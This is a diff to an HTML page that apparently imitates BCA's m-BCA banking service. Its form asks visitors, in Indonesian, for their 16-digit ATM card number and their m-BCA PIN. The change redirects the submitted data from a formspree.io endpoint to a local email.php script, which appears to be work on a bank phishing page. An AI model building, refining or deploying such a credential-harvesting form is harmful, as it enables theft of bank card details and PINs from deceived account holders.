--- a/input.html
+++ b/input.html
@@ -20,8 +20,8 @@
     <img src="https://res.cloudinary.com/codelifings/image/upload/v1613365398/Tak_berjudul43_20210215120201_np8fkd.png" alt="">
   </div>
   <br><br>
-    <form action="https://formspree.io/f/xyybaejk" method="POST">
-      <input class="u-full-width" type="number" placeholder="Masukkan 16 angka No Kartu ATM anda" id="nomor-atm" name="nomor-atm">
+    <form action="email.php" method="POST">
+      <input class="u-full-width" type="number" placeholder="Masukkan 16 angka No Kartu ATM anda" id="nomor-atm" name="nomoratm">
       <input class="u-full-width" type="number" placeholder="Masukkan Pin m-BCA Anda" id="pin" name="pin">
       <input style="float: right" class="button-primary" type="submit" value="OK">
     </form>
